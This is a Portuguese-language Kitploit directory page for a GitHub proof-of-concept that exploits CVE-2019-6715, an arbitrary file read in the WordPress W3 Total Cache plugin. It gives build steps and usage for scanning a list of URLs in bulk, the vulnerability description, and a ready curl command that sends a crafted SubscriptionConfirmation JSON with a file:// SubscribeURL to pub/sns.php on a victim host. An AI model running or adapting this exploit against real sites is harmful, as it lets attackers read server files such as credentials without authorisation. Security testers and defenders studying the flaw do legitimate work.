Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2019-6715 — Exploração de PoC para CVE-2019-6715: leitura arbitrária de arquivos no plugin W3 Total Cache do WordPress através de JSON SubscriptionConfirmation manipulado. Lê arquivos de servidores vulneráveis usando uma lista de URLs via pipe. | Kitploit
Ferramentas/GitHubGitHub/random-robbie/cve-2019-6715
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubrandom-robbie/cve-2019-6715

cve-2019-6715

Exploração de PoC para CVE-2019-6715: leitura arbitrária de arquivos no plugin W3 Total Cache do WordPress através de JSON SubscriptionConfirmation manipulado. Lê arquivos de servidores vulneráveis usando uma lista de URLs via pipe.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
113há 6 anosAinda não revisado

cve-2019-6715

Um salve para o TomNomNom por 99.9% do seu código....

Compilação

root@kitploit:~
go get github.com/fatih/color
go build

Uso

root@kitploit:~
cat list.txt | ./2019-6715

Todas as URLs vulneráveis são registradas em text.log

CVE 2019-6715

Descrição: O pub/sns.php no plugin W3 Total Cache anterior à versão 0.9.4 para WordPress permite que atacantes remotos leiam arquivos arbitrários através do campo SubscribeURL nos dados JSON de SubscriptionConfirmation.

Tipo de Vulnerabilidade: leitura arbitrária de arquivos

Fornecedor do Produto: plugin Wordpress W3 Total Cache por Frederick Townes

Base de Código do Produto Afetado: W3 Total Cache - 0.9.2.6 - 0.9.3, corrigido na versão 0.9.4

Componente Afetado: Arquivo de código fonte afetado: w3-total-cache/pub/sns.php

Exploit - PoC:

root@kitploit:~
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php
Baixar ferramenta